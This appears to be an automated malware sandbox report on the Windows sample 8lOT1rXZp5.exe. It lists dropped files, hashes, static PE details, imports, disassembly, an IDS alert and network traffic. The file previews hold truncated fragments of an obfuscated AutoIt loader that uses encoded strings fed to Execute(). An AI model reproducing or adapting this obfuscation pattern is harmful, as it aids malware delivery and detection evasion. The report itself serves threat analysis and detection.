Size (bytes):	1043006
Entropy (8bit):	5.855292086933286
Encrypted:	false
SSDEEP:	6144:lsumrpbef89hPHsjG+XGma+yiEn5sgz7GP/PDkLyHiB+0RhqTGlTJIWIjly2brL4:3z0bPHHFmabiEn58P6yCBlelyaC0W7
MD5:	EBA2DA2CCB2A92B10E917608F89F8758
SHA1:	232C57CD8BAA2A2017C87274460F3A0B94E1EA33
SHA-256:	D70EFDCFF9ECE6DBA302999CF7121CEBB2625A0A8630977ADFFA0AFDB5AF589F
SHA-512:	AEDEA7FA624A3E05C554EA41C70D7374E8DF0532293768101E9B3FF23AA17F0D386246A90F0063222D225A00B2DF74A312C97CDC5DF3B19912AA07042F515AE7
Malicious:	false
Preview:	$cXEBDC = OPtVKuztlSKJN("98#68#98#70#108#119#70#75#116#97#74#122#73#73#107#66#105#106#84#118",0)..#NoTrayIcon....Func rsxEGWkKMOncmt($XPKf,$MjonO,$KnUcQrN,$KdjRhhrO,$wYQp,$MeGga,$dyjyR,$AkSzH)..Local $QGDSenpYiiAYvbMROCLnb = 'tuZWNRVLzGtTbymOjTysXtFTTrmqEyGhSkCbTyLarvOTTCZHsqdRayGZAyrJaUihqRqkDeUuiNgBdMqdrSJDPOUMECWNewZofBTwBOrfupJFRyJNtMGmkDbkXgGqyutuNujPTZPfOxbGyfVmToIdcmWLrIrhiepZtDRKSUUyWsLRyRuHaiiXbOKgpBLlVBoLlnCBnlHYgDztOyFjCvUZVjBfSD'..Local $soKlcoZGHfEpomoJUcGmtVmImGoQYWjIV = OPtVKuztlSKJN("117#121#102#76#122#78#82#116#115#75#78",3)..Local $WgmpayB = 'LLGXCKhUItcdscRjUiCIoUFQjUwXhfzbtvBaQnusbUatjxLAvjflDTgQyPKHIfHaKXkUUmvvwllgCAESoBAwqoUkoLjqNnIihZzgpQFXPTpaIqhFkSniOGaCeZMphvICCeqDufIaVDkuZCCinHPVZAzHHRkptvKzkGPGZKnVpukkxkCAbEKFGNCwJzVgtmh'...$XiwMJ = 148..$vqYJDYaIQRePb = 74..While ((5800-5799)*5351)..Switch $XiwMJ..Case 143....$biOwerEHqrHZO = Execute(OPtVKuztlSKJN("79#94#117#107#47#127#126#81#120#120#112#124#127#96#123#97#87#115#48",7))..$142 = 113..For $XjXOGOJMMZjeGbgXwXv

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Tenue.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	ASCII text, with very long lines (342), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	945527
Entropy (8bit):	5.837096519903794
Encrypted:	false
SSDEEP:	12288:afFu0JpU7C3YoR3udfbpKCrUDXdgl8OXeJlpZIYahylC:v2UIV3ucKAgmOQZlrC
MD5:	E24236C89CE12EEEB9CFA655716D2994
SHA1:	6B5869C4A43DE9C394284B5657C6709063B530BF
SHA-256:	DE29E32CE6E527B952ADF8D584648C5B5A6805645589E4AC9287BD5481EB5306
SHA-512:	03A58FBF1E6D7433A4493B567F6E8FF0A740721B50D8CA5776DCD14218A9C0EF84877391973CC3F6702B415C3EA4E549C9F9A88859E0B30F83A3DD4CE8AEAFD6
Malicious:	false
Preview:	$cOHflXfqXCmsQs = urjDlX("112<93<122<119<111<71<85<94<73<103<85<121<105<94",4)..#NoTrayIcon....Func WaVZwPQN($TTa,$tufNyIPbz,$vwTrxnD)..Local $xTllHtYNjHPKQAJdsmxqgnY = 'DZVNzHdsrIElVtuqJwkMLMlzzritigrVVQHHokxEsbHoVmxhzzsjhjIRPCzfAklOFJfybnSbHGxgtebUJTKNXQHJiPRFRttyjSCjpfPUATFGRxMNymGGBvRPwFXHHhGCCgejmkKzrPhrlqRNrrAsnbEPqNlEaojhjetDsmgTOjCLpNEqNp'...$frGNgXBqQ = 137..$eVqoQDZ = 79..While ((8286-8285)*8154)..Switch $frGNgXBqQ..Case 129....$SmAzYrPOuGXOXqPa = Execute(urjDlX("88<121<119<110<115<108<78<120<75<113<116<102<121<45<44<124<89<125<70<87<117<119<90<90<85<44<46",5)), $cwhslxOHQ = 'reAagnkMsahLFwhI'..$69 = 148..For $UeMiIhkaZqILMqxCAywAvqdnhOxleGYPsjolmGljgwYeuexFD = 15 To 27..Local $DqYFmSnWJnyzm = 'XQUoDLRoDbYJvkrCAqjHFrtUTcZgeShTjxrbOLlJdcbBGPv'..Local $SmAzYrPOuGXOXqPa = Execute(urjDlX("75<90<113<103<43<57<60<44",3))..Next....$frGNgXBqQ = $frGNgXBqQ + 1..Case 130....$YtuRFUMZfiLDy = urjDlX("85<79<76<93<91<115<85<85<78<81<113<74<84<92",8)..$159 = 59..For $ptbeoGNOPDslFCgrZMcVUoN

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\f

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (342), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	945527
Entropy (8bit):	5.837096519903794
Encrypted:	false
SSDEEP:	12288:afFu0JpU7C3YoR3udfbpKCrUDXdgl8OXeJlpZIYahylC:v2UIV3ucKAgmOQZlrC
MD5:	E24236C89CE12EEEB9CFA655716D2994
SHA1:	6B5869C4A43DE9C394284B5657C6709063B530BF
SHA-256:	DE29E32CE6E527B952ADF8D584648C5B5A6805645589E4AC9287BD5481EB5306
SHA-512:	03A58FBF1E6D7433A4493B567F6E8FF0A740721B50D8CA5776DCD14218A9C0EF84877391973CC3F6702B415C3EA4E549C9F9A88859E0B30F83A3DD4CE8AEAFD6
Malicious:	false
Preview:	$cOHflXfqXCmsQs = urjDlX("112<93<122<119<111<71<85<94<73<103<85<121<105<94",4)..#NoTrayIcon....Func WaVZwPQN($TTa,$tufNyIPbz,$vwTrxnD)..Local $xTllHtYNjHPKQAJdsmxqgnY = 'DZVNzHdsrIElVtuqJwkMLMlzzritigrVVQHHokxEsbHoVmxhzzsjhjIRPCzfAklOFJfybnSbHGxgtebUJTKNXQHJiPRFRttyjSCjpfPUATFGRxMNymGGBvRPwFXHHhGCCgejmkKzrPhrlqRNrrAsnbEPqNlEaojhjetDsmgTOjCLpNEqNp'...$frGNgXBqQ = 137..$eVqoQDZ = 79..While ((8286-8285)*8154)..Switch $frGNgXBqQ..Case 129....$SmAzYrPOuGXOXqPa = Execute(urjDlX("88<121<119<110<115<108<78<120<75<113<116<102<121<45<44<124<89<125<70<87<117<119<90<90<85<44<46",5)), $cwhslxOHQ = 'reAagnkMsahLFwhI'..$69 = 148..For $UeMiIhkaZqILMqxCAywAvqdnhOxleGYPsjolmGljgwYeuexFD = 15 To 27..Local $DqYFmSnWJnyzm = 'XQUoDLRoDbYJvkrCAqjHFrtUTcZgeShTjxrbOLlJdcbBGPv'..Local $SmAzYrPOuGXOXqPa = Execute(urjDlX("75<90<113<103<43<57<60<44",3))..Next....$frGNgXBqQ = $frGNgXBqQ + 1..Case 130....$YtuRFUMZfiLDy = urjDlX("85<79<76<93<91<115<85<85<78<81<113<74<84<92",8)..$159 = 59..For $ptbeoGNOPDslFCgrZMcVUoN

C:\Windows\System32\null

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Algol 68 source, ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.5914042030668325
Encrypted:	false
SSDEEP:	48:O1DUII2X7XK5hwQFDsf7B17r7O7DMmiELK1TI84uNAr:O7I2bKHZcmiEaVqr
MD5:	25E0BBBF6067E8CA9820E3FA9203B237
SHA1:	6AC9FFD7B824AEE01FE8FC6521AC95E6F5F25A66
SHA-256:	4CFDD4F410AE09400AB8F536BAF82601DECE9AAF36FB32498577124D00C5CA42
SHA-512:	9F986A34DED3F439705BE114FE440D46C02B1A3B83F572E1AACA456CE7A38EC7A83C70503FA4131B95DFA74240CA738CD063D316304FF9E960F8B0A42EF0F6F8
Malicious:	false
Preview:	=C:=C:\Windows\System32..admins_group_name=Administrators..admins_sid="S-1-5-32-544"..ALLUSERSPROFILE=C:\ProgramData..APPDATA=C:\Users\user\AppData\Roaming..CommonProgramFiles=C:\Program Files\Common Files..CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files..CommonProgramW6432=C:\Program Files\Common Files..COMPUTERNAME=user-PC..ComSpec=C:\Windows\system32\cmd.exe..DriverData=C:\Windows\System32\Drivers\DriverData..HOMEDRIVE=C:..HOMEPATH=\Users\user..LOCALAPPDATA=C:\Users\user\AppData\Local..LOGONSERVER=\\user-PC..Name=Remote Desktop Users...NUMBER_OF_PROCESSORS=2..OneDrive=C:\Users\user\OneDrive..OS=Windows_NT..Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps..PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC..PROCESSOR_ARCHITECTURE=AMD64..PROCESSOR_IDENTIFIER=Intel64

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	754
Entropy (8bit):	4.501722289958999
Encrypted:	false
SSDEEP:	12:xYV1JnceSZceEd0xeeQTEFhaoYwRwGHaqeS6JozUYae6dhmraMy5V:xYDBcDZcTPIjZYwWqeMUY2kHGV
MD5:	EB265F56777BD576D478648053D18075
SHA1:	562D01958A377C1C7343621F569D65E5D85E7E27
SHA-256:	64A27E60DFB2E033099969449AF134D587A47B99036531EBC6FA0F0BF078D483
SHA-512:	5C2576540026F4C56F1A962919F45967BE9C25CD3D06C188BC2390F195EEE78F1C9C0414C3A2B5CDC30EFC955B284B5921308BA3B06DC2DB8D1B133F60C18F3F
Malicious:	false
Preview:	Cabinet Maker - Lossless Data Compression Tool....MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]..MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...].... source File to compress... destination File name to give compressed file. If omitted, the.. last character of the source file name is replaced.. with an underscore (_) and used as the destination... /F directives A file with MakeCAB directives (may be repeated). Refer to.. Microsoft Cabinet SDK for information on directive_file... /D var=value Defines variable with specified value... /L dir Location to place destination (default is current directory)... /V[n] Verbosity level (1..3)...

\Device\Null

Download File

Process:	C:\Windows\System32\fsutil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	4.17699200758583
Encrypted:	false
SSDEEP:	3:QAFrf2WwFhMjn:QgL2zhMj
MD5:	870D97F130F8CDC708141C407389BE3A
SHA1:	B869CF43CD47F97E9883A9538FB157F2F79F51DC
SHA-256:	2C09238165070B4B23C709CBF1FD749E0FB645EB64B4A8B189E5E3DB2CF2EF59
SHA-512:	BFC916325F759F95C68A59AAECB3DAF4DC5BDAB9BFDC48E817BDB5CA20BAFA355BD0699668BD63420E354751DC1116F4A50949BC4ECBA8E54644BAB10FED3099
Malicious:	false
Preview:	Volume - C: is NOT Dirty..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Entropy (8bit):	7.95428840787824
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8lOT1rXZp5.exe
File size:	4'288'512 bytes
MD5:	34807a743f2d680eef051852eaef0b16
SHA1:	4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256:	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
SHA512:	65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
SSDEEP:	98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF
TLSH:	0B163312A9DE59B2E03A29319018B35B84B58F155B404BA347F93D3F0A709E9DB3F2D7
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...(D.W..........................................@..................................hA..............................................0..Iw.................

File Icon


Icon Hash:	4d1713160ee03301

Static PE Info

General

Entrypoint:	0x4193af
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x57004428 [Sat Apr 2 22:14:00 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a1a66d588dcf1394354ebf6ec400c223

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0041C878h
push 00419540h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0041A1ECh]
pop ecx
or dword ptr [00422B88h], FFFFFFFFh
or dword ptr [00422B8Ch], FFFFFFFFh
call dword ptr [0041A1F0h]
mov ecx, dword ptr [00420B6Ch]
mov dword ptr [eax], ecx
call dword ptr [0041A1F4h]
mov ecx, dword ptr [00420B68h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0041A1F8h]
mov eax, dword ptr [eax]
mov dword ptr [00422B84h], eax
call 00007F3944907DE2h
cmp dword ptr [0041E6E0h], ebx
jne 00007F3944907CCEh
push 00419538h
call dword ptr [0041A1FCh]
pop ecx
call 00007F3944907DB4h
push 0041E074h
push 0041E070h
call 00007F3944907D9Fh
mov eax, dword ptr [00420B64h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00420B60h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041A204h]
push 0041E06Ch
push 0041E000h
call 00007F3944907D6Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cca4	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x27749	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a000	0x390	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x18d6a	0x18e00	c624ae421a6c4f702f7f2c2c23c4aef1	False	0.5999725188442211	data	6.690824618038753	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1a000	0x3fa0	0x4000	746f7c2df0aa9b117542dd3e6429f2f1	False	0.46051025390625	data	5.772102793505232	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x4b90	0x800	07f7ba027ce50640e9ee99eddca1959f	False	0.41162109375	data	3.6363601156539818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x27749	0x27800	f56480b15f21322d964f5d84f77e9198	False	0.21278555181962025	data	4.279123315843305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x23250	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.17338518869040578
RT_ICON	0x33a78	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.21888795459323102
RT_ICON	0x3cf20	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.22407578558225508
RT_ICON	0x423a8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.26352149267831837
RT_ICON	0x465d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.2962655601659751
RT_ICON	0x48b78	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.36632270168855535
RT_ICON	0x49c20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.4787234042553192
RT_GROUP_ICON	0x4a088	0x68	data	0.7692307692307693
RT_VERSION	0x4a0f0	0x350	data	0.47877358490566035
RT_MANIFEST	0x4a440	0x309	ASCII text	0.5341055341055341

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	ShellExecuteExW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHGetSpecialFolderPathW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetParent, ScreenToClient, CreateWindowExW, GetDesktopWindow, GetWindowTextLengthW, SetWindowPos, SetTimer, GetMessageW, CopyImage, KillTimer, CharUpperW, SendMessageW, ShowWindow, BringWindowToTop, wsprintfW, MessageBoxW, EndDialog, ReleaseDC, GetWindowDC, GetMenu, GetWindowLongW, GetClassNameA, wsprintfA, DispatchMessageW, SetWindowTextW, GetSysColor, DestroyWindow, MessageBoxA, GetKeyState, IsWindow, GetDlgItem, GetClientRect, GetSystemMetrics, SetWindowLongW, UnhookWindowsHookEx, SetFocus, SystemParametersInfoW, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetWindowTextW, GetWindowRect
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
KERNEL32.dll	SetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetEnvironmentVariableW, GetDriveTypeW, CreateFileW, LoadLibraryA, SetThreadLocale, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, GetTempPathW, GetCurrentDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetModuleHandleW, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetStdHandle, WriteFile, lstrlenA, CreateDirectoryW, GetFileAttributesW, SetCurrentDirectoryW, GetLocalTime, SystemTimeToFileTime, CreateThread, GetExitCodeThread, Sleep, SetFileAttributesW, GetDiskFreeSpaceExW, SetLastError, GetTickCount, lstrlenW, ExitProcess, lstrcatW, GetProcAddress, CloseHandle, WaitForSingleObject, GetExitCodeProcess, GetQueuedCompletionStatus, ResumeThread, SetInformationJobObject, CreateIoCompletionPort, AssignProcessToJobObject, CreateJobObjectW, GetLastError, CreateProcessW, GetStartupInfoW, GetCommandLineW, GetStartupInfoA
MSVCRT.dll	_purecall, ??2@YAPAXI@Z, _wtol, memset, memmove, memcpy, _wcsnicmp, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, realloc, free, wcsstr, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, strncmp, wcsncmp, wcsncpy, strncpy, ??3@YAXPAX@Z

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T08:20:46.785463+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49842	185.199.111.133	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:20:45.515608072 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:45.515642881 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:45.515764952 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:45.517854929 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:45.517868042 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:46.785382032 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:46.785463095 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:46.803704023 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:46.803725004 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:46.804711103 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:46.846605062 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.100564003 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.143337011 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.477413893 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.477701902 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.477797031 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.477823973 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.477845907 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.477905989 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.477946043 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.485584021 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.487086058 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.487098932 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.494025946 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.495364904 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.495378971 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.510664940 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.511439085 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.511456013 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.596683025 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.596735954 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.596750975 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.678288937 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.678344965 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.678361893 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.678531885 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.678659916 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.681833029 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.681833029 CET	49842	443	192.168.2.4	185.199.111.133
Dec 27, 2024 08:20:47.681854963 CET	443	49842	185.199.111.133	192.168.2.4
Dec 27, 2024 08:20:47.681866884 CET	443	49842	185.199.111.133	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:19:00.835079908 CET	59923	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:01.055994987 CET	53	59923	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:01.256851912 CET	55466	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:01.483133078 CET	53	55466	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:02.341590881 CET	62300	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:02.566025019 CET	53	62300	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:34.104444981 CET	62748	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:34.320914030 CET	53	62748	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:39.676008940 CET	56878	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:39.815160036 CET	53	56878	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:44.938751936 CET	53306	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:45.076601028 CET	53	53306	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:49.160197020 CET	59642	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:49.302920103 CET	53	59642	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:54.379676104 CET	52846	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:54.516683102 CET	53	52846	1.1.1.1	192.168.2.4
Dec 27, 2024 08:19:59.582422972 CET	61518	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:19:59.720005989 CET	53	61518	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:04.832355022 CET	50068	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:04.969499111 CET	53	50068	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:09.963854074 CET	59038	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:10.101816893 CET	53	59038	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:14.394876957 CET	64686	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:14.531977892 CET	53	64686	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:19.442203045 CET	59117	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:19.580393076 CET	53	59117	1.1.1.1	192.168.2.4
